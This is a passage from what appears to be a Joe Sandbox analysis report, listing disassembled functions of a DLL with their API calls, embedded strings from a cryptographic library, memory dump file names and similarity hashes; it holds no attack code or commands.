APIs

Part of subcall function 6CF5D820: _memmove.LIBCMT ref: 6CF5D930

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF3761A

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

HashTransformation: can't truncate a , xrefs: 6CF37552
bytes, xrefs: 6CF37594
byte digest to , xrefs: 6CF37565

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ExceptionException@8RaiseThrowXinvalid_argument_memmovestd::_
String ID: byte digest to $ bytes$HashTransformation: can't truncate a
API String ID: 39012651-1139078987
Opcode ID: 3cb373bc92474ee42c906b6d577661fb8f648e09315186d1c97913e3cf01fc09
Instruction ID: ede69eabb3e5892c8e8aa2bf6bad5cdd418a6e7f22a65ade0437f3e0f4b9dea2
Opcode Fuzzy Hash: 3cb373bc92474ee42c906b6d577661fb8f648e09315186d1c97913e3cf01fc09
Instruction Fuzzy Hash: 3141817110C3C0AFD330CB54D855FDBBBE8AB99714F108A1DE29993B80EB7595088BA7

Function 6CF3BEF0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF3BF2D

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

Strings

gfff, xrefs: 6CF3BF37
gfff, xrefs: 6CF3BF80
vector<T> too long, xrefs: 6CF3BF28

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 082e11327d5f25c8294ee62b6c70bd708d1a1536b14350f3bfd5bd9decf0ba8c
Instruction ID: 885ba3b59c0f8d036a40b87f69ac5aa45f8c961760f799d70098a0580f620eb2
Opcode Fuzzy Hash: 082e11327d5f25c8294ee62b6c70bd708d1a1536b14350f3bfd5bd9decf0ba8c
Instruction Fuzzy Hash: 3831B6B1A00609AFC718CF59DC90E6AF7A9EB48304F148A2DE9599B780DB31B904CB91

Function 6CF68E40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceFrequency.KERNEL32(A64A5C11,A64A5C11), ref: 6CF68E7F
GetLastError.KERNEL32(0000000A), ref: 6CF68E8F

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF68F14

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

Timer: QueryPerformanceFrequency failed with error , xrefs: 6CF68EA5

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: ErrorExceptionException@8FrequencyLastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceFrequency failed with error
API String ID: 2175244869-348333943
Opcode ID: 8e00fbeb7885afe44690442e562f07df672c8b2754b56064c503b6619db57815
Instruction ID: ee279b08fcc0645cd1bd3ecd82e9550dab5fd0ba2802996b411ca9d6fc11b67f
Opcode Fuzzy Hash: 8e00fbeb7885afe44690442e562f07df672c8b2754b56064c503b6619db57815
Instruction Fuzzy Hash: 7E211BB150C380AFD310CF25C845B9BBBF8FB89614F508A1EF5A997781DB75D5088BA2

Function 6CF68F40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(A64A5C11,A64A5C11,?,00000000), ref: 6CF68F7F
GetLastError.KERNEL32(0000000A,?,00000000), ref: 6CF68F8F

Part of subcall function 6CF04010: std::_Xinvalid_argument.LIBCPMT ref: 6CF0402A

__CxxThrowException@8.LIBCMT ref: 6CF69014

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

Strings

Timer: QueryPerformanceCounter failed with error , xrefs: 6CF68FA5

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: CounterErrorExceptionException@8LastPerformanceQueryRaiseThrowXinvalid_argumentstd::_
String ID: Timer: QueryPerformanceCounter failed with error
API String ID: 1823523280-4075696077
Opcode ID: 6d9f8bdcaffc3c51ee9517b44608a1ebbc0cedeeed3e35a5648165204e0f22a7
Instruction ID: d351d80bb24dd009b6d850bc1e6f7673bb3b93457112b8d2ac4e9ecccb51edf3
Opcode Fuzzy Hash: 6d9f8bdcaffc3c51ee9517b44608a1ebbc0cedeeed3e35a5648165204e0f22a7
Instruction Fuzzy Hash: C1211D71508380AFD310CF65D841B9BBBF8FB89618F508A1DF5A993781DB75D5088BA2

Function 6CF36480 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 6CF36518

Part of subcall function 6CF6AC75: RaiseException.KERNEL32(?,?,6CF69C34,A64A5C11,?,?,?,?,6CF69C34,A64A5C11,6CF99C90,6CFAB974,A64A5C11), ref: 6CF6ACB7

__CxxThrowException@8.LIBCMT ref: 6CF36558

Strings

Cryptographic algorithms are disabled before the power-up self tests are performed., xrefs: 6CF364E7
Cryptographic algorithms are disabled after a power-up self test failed., xrefs: 6CF36527

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Cryptographic algorithms are disabled after a power-up self test failed.$Cryptographic algorithms are disabled before the power-up self tests are performed.
API String ID: 3476068407-3345525433
Opcode ID: 61ef898dfac6e85bd07e366fca555ad302d0c64e02d6b43d3e74ed6932799c65
Instruction ID: 2e55f5ca312b1578a33011e92a8d24d5b5edde872c6656f11782e6a0ee0827a0
Opcode Fuzzy Hash: 61ef898dfac6e85bd07e366fca555ad302d0c64e02d6b43d3e74ed6932799c65
Instruction Fuzzy Hash: 6921C071618390AED724CF74C950FDBB3F8BB4964CF408A1DF58982A44EB76D4088AA3

Function 6CF3C120 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 52COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 6CF3C14E

Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF690ED
Part of subcall function 6CF690D8: __CxxThrowException@8.LIBCMT ref: 6CF69102
Part of subcall function 6CF690D8: std::exception::exception.LIBCMT ref: 6CF69113

Strings

gfff, xrefs: 6CF3C15A
vector<T> too long, xrefs: 6CF3C149
gfff, xrefs: 6CF3C129

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: gfff$gfff$vector<T> too long
API String ID: 1823113695-3369487235
Opcode ID: 7d0d354f3dba1488e08d3c9cea1099f5d9b0f1abd48595b424e47434dda0630f
Instruction ID: ea6ca39e7a1d4a64954374f2f04159d716350df488155e3602a05f1446e9e7c2
Opcode Fuzzy Hash: 7d0d354f3dba1488e08d3c9cea1099f5d9b0f1abd48595b424e47434dda0630f
Instruction Fuzzy Hash: F601AD73F040356F8310A93FED4048AEA87AAC839571ACB3AE60CDBB58E531D84252C2

Function 6CF425D0 Relevance: 6.2, APIs: 4, Instructions: 206COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 6CF42677
_memmove.LIBCMT ref: 6CF426E6
_memmove.LIBCMT ref: 6CF42746
__CxxThrowException@8.LIBCMT ref: 6CF427CD

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: _memmove$Exception@8Throw
String ID:
API String ID: 2655171816-0
Opcode ID: 3350f9803febf4115d2249703e4c2785a429840ff8e881a2f5cf5902cf37e599
Instruction ID: 4f92b862a71d34b9875b9fc9645ae3d405d064a0eab60800638e8de798979adf
Opcode Fuzzy Hash: 3350f9803febf4115d2249703e4c2785a429840ff8e881a2f5cf5902cf37e599
Instruction Fuzzy Hash: B5516F753087058FD704DF69D994A1FBBE9AFC8604F10892DE495C3B42EB36E909CB92

Function 6CF1D4B0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF1D5E4
__CxxThrowException@8.LIBCMT ref: 6CF1D5F9
std::exception::exception.LIBCMT ref: 6CF1D608
__CxxThrowException@8.LIBCMT ref: 6CF1D61D

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: bc8dcdde366ecf7928c96c23f43fe82783f10b81af9813b64636d0783af0812c
Instruction ID: 496bc0add971a8937f320a03df0df345632b80dec35d4aa4ef9674c80b4348b4
Opcode Fuzzy Hash: bc8dcdde366ecf7928c96c23f43fe82783f10b81af9813b64636d0783af0812c
Instruction Fuzzy Hash: 7A5147B1A05649AFDB04CFA9C980A89FBF4FF09304F50866AE419D7F40D771EA14CBA1

Function 6CF25F00 Relevance: 6.1, APIs: 4, Instructions: 135COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF26035
__CxxThrowException@8.LIBCMT ref: 6CF2604A
std::exception::exception.LIBCMT ref: 6CF26059
__CxxThrowException@8.LIBCMT ref: 6CF2606E

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 0d8b04f8df4f16342e5a5d335651dfb997b1f9a03654481425a3bda4879600f3
Instruction ID: cea7fd44e966e6046fc29bebfa383458a4612683a0d49f40d5e30295f5a21b45
Opcode Fuzzy Hash: 0d8b04f8df4f16342e5a5d335651dfb997b1f9a03654481425a3bda4879600f3
Instruction Fuzzy Hash: 075149B1A0164AAFC704CFA9C880A89FBF4FF09304F10866EE419D7B50D775EA14CBA1

Function 6CF1DE50 Relevance: 6.1, APIs: 4, Instructions: 118COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 6CF1DE81
VariantClear.OLEAUT32(?), ref: 6CF1DF3C
VariantClear.OLEAUT32(?), ref: 6CF1DF6D
VariantClear.OLEAUT32(?), ref: 6CF1DF8B

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: Variant$Clear$Init
String ID:
API String ID: 3740757921-0
Opcode ID: e930bdda92565a7f8c185ad1a6e52014c12a6be06fc258b6d0726b2fdb9dbb4f
Instruction ID: de41c72c2dcda0255b56236362c4f098e3127135506c036b184a8a655a22087d
Opcode Fuzzy Hash: e930bdda92565a7f8c185ad1a6e52014c12a6be06fc258b6d0726b2fdb9dbb4f
Instruction Fuzzy Hash: 63418A326092419FD700DF2AC840B9AB7F8FF99714F148A6AF9449BB50D731E905CBA2

Function 6CF25DB0 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF25E87
__CxxThrowException@8.LIBCMT ref: 6CF25E9C
std::exception::exception.LIBCMT ref: 6CF25EAB
__CxxThrowException@8.LIBCMT ref: 6CF25EC0

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: 389fad72c346ac0d8a4132d3b0203be312a45af23f413d59c3fc69206aa98c99
Instruction ID: 5c34b407e353912833648ec992f13ec6438311df0f11400bed0a005bf640e9dc
Opcode Fuzzy Hash: 389fad72c346ac0d8a4132d3b0203be312a45af23f413d59c3fc69206aa98c99
Instruction Fuzzy Hash: 5A4150B19057449FD720CFA9C880A9AFBF4FF09304F50896ED45A97B41E775E608CB61

Function 6CF1D360 Relevance: 6.1, APIs: 4, Instructions: 115COMMON

Download Yara Rule

APIs

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF1D437
__CxxThrowException@8.LIBCMT ref: 6CF1D44C
std::exception::exception.LIBCMT ref: 6CF1D45B
__CxxThrowException@8.LIBCMT ref: 6CF1D470

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6cf00000_86KZvDaOZR.jbxd

Similarity

API ID: std::exception::exception$Exception@8Throw$_malloc
String ID:
API String ID: 2621100827-0
Opcode ID: bba8edebc0ebc1d46eb1886219e512ec852b4e9a02e23ef959e795785050a19a
Instruction ID: 70713f515863bb17c2dcddaee4bf3b20ab26a6f0348274230fcd12620a43542f
Opcode Fuzzy Hash: bba8edebc0ebc1d46eb1886219e512ec852b4e9a02e23ef959e795785050a19a
Instruction Fuzzy Hash: F9413DB19057489FC710CF69D880A8AFBF4FF09304F50896ED55A97B41E771E608CBA1

Function 6CF62B80 Relevance: 6.1, APIs: 4, Instructions: 112COMMON

Download Yara Rule

APIs

Part of subcall function 6CF36480: __CxxThrowException@8.LIBCMT ref: 6CF36518
Part of subcall function 6CF36480: __CxxThrowException@8.LIBCMT ref: 6CF36558

Part of subcall function 6CF69BB5: _malloc.LIBCMT ref: 6CF69BCF

std::exception::exception.LIBCMT ref: 6CF62C9A
__CxxThrowException@8.LIBCMT ref: 6CF62CB1
std::exception::exception.LIBCMT ref: 6CF62CC3
__CxxThrowException@8.LIBCMT ref: 6CF62CDA

Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C04
Part of subcall function 6CF69BB5: std::exception::exception.LIBCMT ref: 6CF69C1E
Part of subcall function 6CF69BB5: __CxxThrowException@8.LIBCMT ref: 6CF69C2F

Memory Dump Source

Source File: 00000000.00000002.2026296615.000000006CF01000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CF00000, based on PE: true

Associated: 00000000.00000002.2026279524.000000006CF00000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2027926866.000000006CF84000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028771594.000000006CF9E000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028791861.000000006CFA0000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028812796.000000006CFA1000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028832778.000000006CFA3000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAA000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2028863063.000000006CFAC000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000000.00000002.2029217229.000000006CFAE000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

